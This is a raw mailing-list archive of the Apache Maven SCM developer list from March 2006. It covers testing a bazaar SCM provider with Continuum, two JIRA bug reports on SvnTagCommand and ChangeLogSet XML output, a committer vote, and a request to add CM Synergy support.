[email protected] Received: (qmail 93275 invoked by uid 99); 6 Mar 2006 16:49:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 08:49:10 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 08:49:09 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 16:41:01 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Mon, 06 Mar 2006 16:41:00 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 16:40:59 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 06 Mar 2006 16:40:53 +0000 (GMT) Date: Mon, 06 Mar 2006 17:40:51 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: Testing maven-scm with continuum In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N How do I add a changelog report for non cvs providers? Maven gives me: > If using another scm, maven.changelog.factory must be set. > See the maven changelog plugin documentation for correct settings. I don't see it in the documentation. Is there other setup eg. reports or client software, I should try to test maven-scm? Torbjørn From [email protected] Mon Mar 06 17:05:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32177 invoked from network); 6 Mar 2006 17:05:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 17:05:31 -0000 Received: (qmail 57806 invoked by uid 500); 6 Mar 2006 17:06:04 -0000 Delivered-To: [email protected] Received: (qmail 57785 invoked by uid 500); 6 Mar 2006 17:06:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 57774 invoked by uid 99); 6 Mar 2006 17:06:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 09:06:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 06 Mar 2006 09:06:03 -0800 Received: (qmail 7032 invoked from network); 6 Mar 2006 17:05:48 -0000 Received: from 171.189.97-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 6 Mar 2006 17:05:48 -0000 Message-ID: <[email protected]> Date: Mon, 06 Mar 2006 18:05:35 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: Testing maven-scm with continuum References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N whith m1 or m2? For testing a provider with continuum, provider lib must be in continuum lib directory, add your project and click on build now Emmanuel Torbjørn Smørgrav a écrit : > How do I add a changelog report for non cvs providers? > > Maven gives me: > >>If using another scm, maven.changelog.factory must be set. >>See the maven changelog plugin documentation for correct settings. > > > I don't see it in the documentation. > > Is there other setup eg. reports or client software, I should try to test > maven-scm? > > Torbjørn > > > > From [email protected] Mon Mar 06 17:26:49 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46663 invoked from network); 6 Mar 2006 17:26:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 17:26:48 -0000 Received: (qmail 1654 invoked by uid 500); 6 Mar 2006 17:27:32 -0000 Delivered-To: [email protected] Received: (qmail 1633 invoked by uid 500); 6 Mar 2006 17:27:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 1622 invoked by uid 99); 6 Mar 2006 17:27:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 09:27:32 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 09:27:31 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 17:22:16 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Mon, 06 Mar 2006 17:22:16 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 17:22:14 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 06 Mar 2006 17:22:13 +0000 (GMT) Date: Mon, 06 Mar 2006 18:22:12 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: Testing maven-scm with continuum In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I have been running continuum with my bazaar projects for some time now, but I have only done the regular checkout, build, install, deploy and site-deploy. What I want is to add a chengelog report: changelog-maven-plugin [m2] Or what I really want is to use client software (like continuum) that use changelog and diff to see if they work with bazaar. Torbjørn -----Original Message----- From: Emmanuel Venisse [mailto:[email protected]] Sent: 6. mars 2006 18:06 To: [email protected] Subject: Re: Testing maven-scm with continuum whith m1 or m2? For testing a provider with continuum, provider lib must be in continuum lib directory, add your project and click on build now Emmanuel Torbjørn Smørgrav a écrit : > How do I add a changelog report for non cvs providers? > > Maven gives me: > >>If using another scm, maven.changelog.factory must be set. >>See the maven changelog plugin documentation for correct settings. > > > I don't see it in the documentation. > > Is there other setup eg. reports or client software, I should try to test > maven-scm? > > Torbjørn > > > > From [email protected] Mon Mar 06 17:29:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47928 invoked from network); 6 Mar 2006 17:28:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 17:28:59 -0000 Received: (qmail 6804 invoked by uid 500); 6 Mar 2006 17:29:46 -0000 Delivered-To: [email protected] Received: (qmail 6754 invoked by uid 500); 6 Mar 2006 17:29:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 6743 invoked by uid 99); 6 Mar 2006 17:29:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 09:29:45 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 09:29:43 -0800 Received: (qmail 6193 invoked by uid 89); 6 Mar 2006 17:29:23 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 6 Mar 2006 17:29:23 -0000 Message-ID: <[email protected]> Date: Mon, 6 Mar 2006 11:29:23 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (SCM-170) SvnTagCommand doesn't work? MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-170?page=all ] Emmanuel Venisse closed SCM-170: -------------------------------- Resolution: Won't Fix Fix Version: (was: 1.0) svn copy accept --file parameter : http://svnbook.red-bean.com/nightly/en/svn-book.html#svn.ref.svn.c.copy I guess you don't have define the tagBase parameter. You must define it to specify the location of tags directory in your svn > SvnTagCommand doesn't work? > --------------------------- > > Key: SCM-170 > URL: http://jira.codehaus.org/browse/SCM-170 > Project: Maven SCM > Type: Bug > Reporter: Gareth Williams > Priority: Critical > > > mvn release:prepare fails with the following output: > Provider message: > The svn tag command failed. > Command output: > svn: Local, non-commit operations do not take a log message > Have looked at source, and suspect SvnTagCommand needs to be fixed - in SVN the copy command does not accept a log message > Package: org.apache.maven.scm.provider.svn.svnexe.command.tag > Class: SvnTagCommand > private static Commandline createCommandLine( SvnScmProviderRepository repository, File workingDirectory, > String tag, File messageFile ) > { > cl.createArgument().setValue( "copy" ); > XXX cl.createArgument().setValue( "--file" ); > XXX cl.createArgument().setValue( messageFile.getAbsolutePath() ); > .... > } -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Mar 06 17:36:22 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50971 invoked from network); 6 Mar 2006 17:36:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 17:36:08 -0000 Received: (qmail 19243 invoked by uid 500); 6 Mar 2006 17:36:44 -0000 Delivered-To: [email protected] Received: (qmail 19226 invoked by uid 500); 6 Mar 2006 17:36:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 19215 invoked by uid 99); 6 Mar 2006 17:36:43 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 09:36:43 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 06 Mar 2006 09:36:42 -0800 Received: (qmail 27663 invoked from network); 6 Mar 2006 17:36:28 -0000 Received: from 171.189.97-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 6 Mar 2006 17:36:28 -0000 Message-ID: <[email protected]> Date: Mon, 06 Mar 2006 18:36:16 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: Testing maven-scm with continuum References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N continuum can't use directly changelog and diff plugin, it's the maven work. (http://mojo.codehaus.org/changelog-maven-plugin/howto.html), you must use snapshot version of changelog plugin continuum use changelog scm api via update scm command, the result is in continuum build results Emmanuel Torbjørn Smørgrav a écrit : > I have been running continuum with my bazaar projects for some time now, > but I have only done the regular checkout, build, install, deploy and > site-deploy. > > What I want is to add a chengelog report: changelog-maven-plugin [m2] > Or what I really want is to use client software (like continuum) that use > changelog and diff to see if they work with bazaar. > > Torbjørn > > -----Original Message----- > From: Emmanuel Venisse [mailto:[email protected]] > Sent: 6. mars 2006 18:06 > To: [email protected] > Subject: Re: Testing maven-scm with continuum > > > whith m1 or m2? > > For testing a provider with continuum, provider lib must be in continuum lib > directory, add your > project and click on build now > > Emmanuel > > Torbjørn Smørgrav a écrit : > >>How do I add a changelog report for non cvs providers? >> >>Maven gives me: >> >> >>>If using another scm, maven.changelog.factory must be set. >>>See the maven changelog plugin documentation for correct settings. >> >> >>I don't see it in the documentation. >> >>Is there other setup eg. reports or client software, I should try to test >>maven-scm? >> >>Torbjørn >> >> >> >> > > > > > From [email protected] Mon Mar 06 19:05:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98282 invoked from network); 6 Mar 2006 19:04:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 19:04:55 -0000 Received: (qmail 91929 invoked by uid 500); 6 Mar 2006 19:05:33 -0000 Delivered-To: [email protected] Received: (qmail 91913 invoked by uid 500); 6 Mar 2006 19:05:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 91902 invoked by uid 99); 6 Mar 2006 19:05:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 11:05:32 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 11:05:31 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 19:05:12 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Mon, 06 Mar 2006 19:05:12 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 19:05:10 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 06 Mar 2006 19:05:03 +0000 (GMT) Date: Mon, 06 Mar 2006 20:05:02 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: logger.debug In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N How do I use the debug logger level for the bazaar provider? I want to use it more to reduce some noise but... If I turn on debug mode when running maven eg. surefire:test the debug info (from the provider) is not printed out. Regards Torbjørn From [email protected] Tue Mar 07 10:40:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26051 invoked from network); 7 Mar 2006 10:40:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2006 10:40:47 -0000 Received: (qmail 86750 invoked by uid 500); 7 Mar 2006 10:40:47 -0000 Delivered-To: [email protected] Received: (qmail 86306 invoked by uid 500); 7 Mar 2006 10:40:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 86283 invoked by uid 99); 7 Mar 2006 10:40:44 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 02:40:44 -0800 Received: (qmail 11666 invoked by uid 89); 7 Mar 2006 10:40:22 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 7 Mar 2006 10:40:22 -0000 Message-ID: <[email protected]> Date: Tue, 7 Mar 2006 04:40:22 -0600 (CST) From: "Olivier Lamy (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (SCM-171) Incorrect xml changeLog generated if no endDate (toXML method in ChangeLogSet) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Incorrect xml changeLog generated if no endDate (toXML method in ChangeLogSet) ------------------------------------------------------------------------------ Key: SCM-171 URL: http://jira.codehaus.org/browse/SCM-171 Project: Maven SCM Type: Bug Components: maven-scm-api Environment: all Reporter: Olivier Lamy The method toXML in http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-api/src/main/java/org/apache/maven/scm/command/changelog/ChangeLogSet.java?rev=374372&view=markup generate a bad xml if the end date is not specified. The lines : if ( endDate != null ) { buffer.append( " end=\"" ) .append( formatter.format( endDate ) ) .append( "\">" ); } buffer.append( "\n" ); should be : if ( endDate != null ) { buffer.append( " end=\"" ) .append( formatter.format( endDate ) ) .append( "\"" ); } buffer.append( ">\n" ); -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Mar 07 11:08:47 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38347 invoked from network); 7 Mar 2006 11:08:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2006 11:08:47 -0000 Received: (qmail 22312 invoked by uid 500); 7 Mar 2006 11:08:46 -0000 Delivered-To: [email protected] Received: (qmail 22259 invoked by uid 500); 7 Mar 2006 11:08:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 22248 invoked by uid 99); 7 Mar 2006 11:08:45 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 03:08:44 -0800 Received: (qmail 11846 invoked by uid 89); 7 Mar 2006 11:08:23 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 7 Mar 2006 11:08:23 -0000 Message-ID: <[email protected]> Date: Tue, 7 Mar 2006 05:08:22 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (SCM-171) Incorrect xml changeLog generated if no endDate (toXML method in ChangeLogSet) In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-171?page=all ] Emmanuel Venisse closed SCM-171: -------------------------------- Assign To: Emmanuel Venisse Resolution: Fixed Fix Version: 1.0 Applied and deployed. Thanks > Incorrect xml changeLog generated if no endDate (toXML method in ChangeLogSet) > ------------------------------------------------------------------------------ > > Key: SCM-171 > URL: http://jira.codehaus.org/browse/SCM-171 > Project: Maven SCM > Type: Bug > Components: maven-scm-api > Environment: all > Reporter: Olivier Lamy > Assignee: Emmanuel Venisse > Fix For: 1.0 > > > The method toXML in http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-api/src/main/java/org/apache/maven/scm/command/changelog/ChangeLogSet.java?rev=374372&view=markup > generate a bad xml if the end date is not specified. > The lines : > if ( endDate != null ) > { > buffer.append( " end=\"" ) > .append( formatter.format( endDate ) ) > .append( "\">" ); > } > buffer.append( "\n" ); > should be : > if ( endDate != null ) > { > buffer.append( " end=\"" ) > .append( formatter.format( endDate ) ) > .append( "\"" ); > } > buffer.append( ">\n" ); -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Mar 09 03:52:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28892 invoked from network); 9 Mar 2006 03:52:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Mar 2006 03:52:08 -0000 Received: (qmail 7193 invoked by uid 500); 9 Mar 2006 03:52:08 -0000 Delivered-To: [email protected] Received: (qmail 7114 invoked by uid 500); 9 Mar 2006 03:52:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 7101 invoked by uid 99); 9 Mar 2006 03:52:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 19:52:07 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony3.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 19:52:06 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony3.iinet.net.au with ESMTP; 09 Mar 2006 11:51:37 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,177,1139155200"; d="scan'208"; a="692825137:sNHT1167738672" Message-ID: <[email protected]> Date: Thu, 09 Mar 2006 14:51:33 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [vote] Add =?ISO-8859-1?Q?Torbj=F8rn_Sm=F8rgrav_as_Mav?= =?ISO-8859-1?Q?en-SCM_committer?= References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Got 6 x +1's here. Time to move forward? Emmanuel Venisse wrote: > Hi > > I'd want to add Torbjørn Smørgrav as Maven-SCM committer. > He's the maintainer of bazaar scm provider and have done a good work on > it and TCK. > He want to maintain it in next year (at least). > > Here my +1 > > Emmanuel > From [email protected] Tue Mar 21 09:07:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45958 invoked from network); 21 Mar 2006 09:07:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 09:07:26 -0000 Received: (qmail 85339 invoked by uid 500); 21 Mar 2006 09:07:24 -0000 Delivered-To: [email protected] Received: (qmail 85319 invoked by uid 500); 21 Mar 2006 09:07:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 85308 invoked by uid 99); 21 Mar 2006 09:07:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 01:07:24 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=HTML_10_20,HTML_MESSAGE,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp2.transport.bombardier.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 01:07:23 -0800 Received: from EMEAML02.UK.BOMBARDIER.TRANSPORT.COM (emea-ml02.atle.bombardier.com [161.129.204.104]) by smtp2.transport.bombardier.com (Switch-3.1.6/Switch-3.1.6) with ESMTP id k2L8qZSH005693 for <[email protected]>; Tue, 21 Mar 2006 10:06:46 +0100 (CET) To: [email protected] Subject: Support for CM Synergy MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.0 September 26, 2002 From: [email protected] Message-ID: <[email protected]> Date: Tue, 21 Mar 2006 10:05:57 +0100 X-MIMETrack: Serialize by Router on EMEA-ML02/Server/Transport/Bombardier(Release 6.0.3|September 18, 2003) at 03/21/2006 09:08:59, Serialize complete at 03/21/2006 09:08:59 Content-Type: multipart/alternative; boundary="=_alternative 0031C6ACC1257138_=" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multipart message in MIME format. --=_alternative 0031C6ACC1257138_= Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I have recently started to use Maven for a Java product we have. We are=20 using CM Synergy as our SCM tool and I would like to try to add support=20 for CM Synergy to Maven SCM.=20 Can someone guide me what the process is to add this support? I read on the Wiki that someone else started to do this, but I can't find=20 any more information about this. Best Regards Henrik J=F6nsson Bombardier Transportation =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= 